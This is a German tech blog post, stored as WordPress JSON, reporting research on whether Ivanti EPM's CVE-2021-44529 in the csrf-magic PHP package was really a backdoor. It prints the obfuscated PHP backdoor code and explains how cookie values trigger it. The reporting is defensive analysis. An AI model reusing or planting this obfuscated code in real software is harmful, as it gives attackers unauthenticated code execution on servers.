{"id":292536,"date":"2024-02-21T10:22:22","date_gmt":"2024-02-21T09:22:22","guid":{"rendered":"https:\/\/www.borncity.com\/blog\/?p=292536"},"modified":"2024-02-22T01:35:43","modified_gmt":"2024-02-22T00:35:43","slug":"ivanti-endpoint-manager-schwachstelle-cve-2021-44529-code-injection-oder-backdoor","status":"publish","type":"post","link":"https:\/\/borncity.com\/blog\/2024\/02\/21\/ivanti-endpoint-manager-schwachstelle-cve-2021-44529-code-injection-oder-backdoor\/","title":{"rendered":"Ivanti Endpoint Manager Schwachstelle CVE-2021-44529: Code-Injection oder Backdoor?"},"content":{"rendered":"

\"Sicherheit[English<\/a>]Neuer Schwank rund um den Ivanti Endpoint Manager. Im Jahr 2021 wurde von Ivanti im Produkt eine als \"Code Injection\" bezeichnete Sicherheitsl\u00fccke CVE-2021-44529 geschlossen. Es gab Ger\u00fcchte, dass es sich um einen Backdoor (Hintert\u00fcr) in einem Open-Source-Projekt handelte. Ein Sicherheitsforscher hat sich darauf hin den Code nochmals genauer angesehen und erstaunliche Erkenntnisse gewonnen.<\/p>\n

<\/p>\n

CVE-2021-44529 in Ivanti Endpoint Manager<\/h2>\n

\"\"Ich hatte es hier im Blog nicht thematisiert, da Ivanti 2021 bei mir noch nicht auf dem Radar war (kam erst mit dem Hack von Norwegens Regierungen, siehe Norwegens Regierung \u00fcber Ivanti-Zero-Day gehackt<\/a> und die Links am Artikelende). Am 8. Dezember 2021 gab es eine Warnung zur Schwachstelle CVE-2021-44529<\/a>.\u00a0 Es war eine Code-Injection-Schwachstelle in der Ivanti EPM Cloud Services Appliance (CSA) bekannt geworden. Diese erlaubt es, einem nicht-authentifizierten Benutzer, beliebigen Code mit eingeschr\u00e4nkten Rechten (nobody) auszuf\u00fchren.<\/p>\n

Das betraf den Ivanti Endpoint Manager CSA Version 4.5 und 4.6. Ivanti hatte am 2. Dezember 2021 dieses Security Advisory<\/a> herausgegeben. Dort finden sich auch Hinweise auf Updates und Gegenma\u00dfnahmen. Von PacketStorm-Security gab es dann zum 18. Januar 2023 noch einen Folgebeitrag<\/a> zur Schwachstelle, der einen Metasploit<\/a> f\u00fcr die Schwachstelle enthielt.<\/p>\n

Backdoor oder Code-Injection-Schwachstelle?<\/h2>\n

Gerade bin ich \u00fcber nachfolgenden Tweet<\/a> auf eine neue Information gesto\u00dfen. Ron Bowes von Greynoise Labs hat sich die Schwachstelle und den Quellcode nochmals angeschaut. Dies war m\u00f6glich, weil Ivanti Open Source Software in seinem Produkt verwendet hat. Hintergrund war, dass Sicherheitsexperte Tuan Anh Nguyen <\/a>im M\u00e4rz 2022 schrieb<\/a>, dass er sich sicher sei, dass die Schwachstelle als Backdoor in die Software gekommen ist. Nachfolgender Tweet legt den Punkt bereits offen:<\/p>\n

<\/a><\/p>\n

Ron Bowes ist diesem Verdacht nachgegangen, hat recherchiert und hat sich \u00fcber die Way Back Machine den Code des betreffenden Pakets genauer angegeben. Es handelt sich, wenn ich es richtig verstanden habe, um csrf-magic<\/a>, ein Paket, welches einen Cross-Site-Request-Forgery-Angriff<\/a> in PHP verhindern soll. \u00dcber die Way Back Machine ist er auf ein Archiv vom M\u00e4rz 2022 gesto\u00dfen, aber der letzte Commit war vom Februar 2014.<\/p>\n

Dann begann der Sicherheitsforscher den Quellcode nach einer Backdoor zu durchsuchen. Seine Vermutung war, dass die Backdoor sorgf\u00e4ltig im Code versteckt sein wurde. Aber er wurde am Ende der Datei im Quellcode f\u00fcndig.<\/p>\n

\/\/ Obscure Tokens\r\n$aeym=\"RlKHfsByZWdfcmVwfsbGFjZShhcnJheSgnLfs1teXHc9fsXHNdLyfscsJy9fsccy8nfsKSwgYXJyfsYXkoJycsfsJysn\";\r\n$lviw = str_replace(\"m\",\"\",\"msmtmr_mrmemplmamcme\");\r\n$bbhj=\"JGMofsJGEpPjMpefsyRrPSdjMTIzJzfstlfsY2hvICc8Jy4kay4nPic7ZXfsZfshbChiYXNlNjRfZGVjb2\";\r\n$hpbk=\"fsJGfsM9fsJ2NvdW50fsJzfsskYfsT0kXfs0NPT0tJRTtpZihyfsZfsXNldfsCgfskYfsSkfs9fsPSdhYicgJiYg\";\r\n$rvom=\"KSwgam9pbihhcnfsJheV9zbGljZSgkYSwkYyfsgkYSktMyfskpfsKSkpOfs2VjaG8gJzwvJy4fskay4nPic7fQ==\";\r\n$xytu = $lviw(\"oc\", \"\", \"ocbocaocseoc6oc4_ocdoceoccocoocdoce\");\r\n$murp = $lviw(\"k\",\"\",\"kckrkeaktkek_kfkunkcktkikokn\");\r\n$zmto = $murp('', $xytu($lviw(\"fs\", \"\", $hpbk.$bbhj.$aeym.$rvom))); $zmto();<\/pre>\n
Er begann den obigen Code zu analysieren und kam zum Schluss, dass dort die Backdoor sei. Diese ben\u00f6tigt mindestens 4 Cookies f\u00fcr den Code Injection-Angriff. Das erste Cookie muss den Wert \"ab\" haben, und die letzten drei Cookies werden verkettet, als leicht verschl\u00fcsselte base64 dekodiert und ausgef\u00fchrt. Ron Bowes hat seine Erkenntnisse im Beitrag Code injection or backdoor: A new look at Ivanti's CVE-2021-44529<\/a> ver\u00f6ffentlicht.<\/p>\n
Im schlechtesten Fall steckte die Schwachstelle CVE-2021-44529, letztendlich wohl eine Backdoor, bereits seit sieben Jahren im Open Source Modul. Und es scheint recht einfach zu sein, einen Exploit f\u00fcr diese Schwachstelle zu schreiben. Wie dieser Code in das Projekt gekommen ist und warum das nicht auffiel, blieb im Dunkeln. Aber der Fall zeigt, dass Ivanti die Sicherheit mit seinen Produkten nicht im Griff hat – ich hatte ja im Beitrag Kleine Warnung: Finger weg von Ivanti VPN; die benutzen wohl Uralt-Tools mit<\/a> bereits einen anderen Fall aufgegriffen – was sp\u00e4ter auch anderen Sicherheitsforschern auffiel (siehe Ivantis uralter Software-Klump \u2013 f\u00e4llt auch Sicherheitsforschern auf<\/a>).<\/p>\n
\u00c4hnliche Artikel:
\n<\/strong>Norwegens Regierung \u00fcber Ivanti-Zero-Day gehackt<\/a>
\nIvanti best\u00e4tigt 2. Schwachstelle CVE-2023-35081 bei Hack der norwegischen Regierung<\/a>
\nDiensttelefone des Digitalministeriums \u00fcber Ivanti-Schwachstellen angreifbar<\/a>
\nSchwachstelle CVE-2023-35082 in Ivanti MobileIron Core (bis Version 11.2)<\/a>
\n<\/strong>Warnung vor Schwachstellen; Fortinet, Ivanti und mehr (Januar 2024)<\/a>
\nTausende Ger\u00e4te per Ivanti VPN-Schwachstellen angegriffen \u2013 mind. 19 in Deutschland<\/a>
\nMassive Angriffswelle auf Ivanti VPN-Appliances; Warnung, Konfigurations-Pushes kann H\u00e4rtungsma\u00dfnahmen gef\u00e4hrden<\/a>
\nIvanti Connect Secure: Neue Schwachstellen CVE-2024-21888 und CVE-2024-21893 gepatcht<\/a>
\nKleine Warnung: Finger weg von Ivanti VPN; die benutzen wohl Uralt-Tools mit<\/a>
\nIvantis uralter Software-Klump \u2013 f\u00e4llt auch Sicherheitsforschern auf<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
[English]Neuer Schwank rund um den Ivanti Endpoint Manager. Im Jahr 2021 wurde von Ivanti im Produkt eine als \"Code Injection\" bezeichnete Sicherheitsl\u00fccke CVE-2021-44529 geschlossen. Es gab Ger\u00fcchte, dass es sich um einen Backdoor (Hintert\u00fcr) in einem Open-Source-Projekt handelte. Ein Sicherheitsforscher … Weiterlesen →<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[426],"tags":[4328],"class_list":["post-292536","post","type-post","status-publish","format-standard","hentry","category-sicherheit","tag-sicherheit"],"_links":{"self":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/292536","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/comments?post=292536"}],"version-history":[{"count":0,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/292536\/revisions"}],"wp:attachment":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/media?parent=292536"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/categories?post=292536"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/tags?post=292536"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}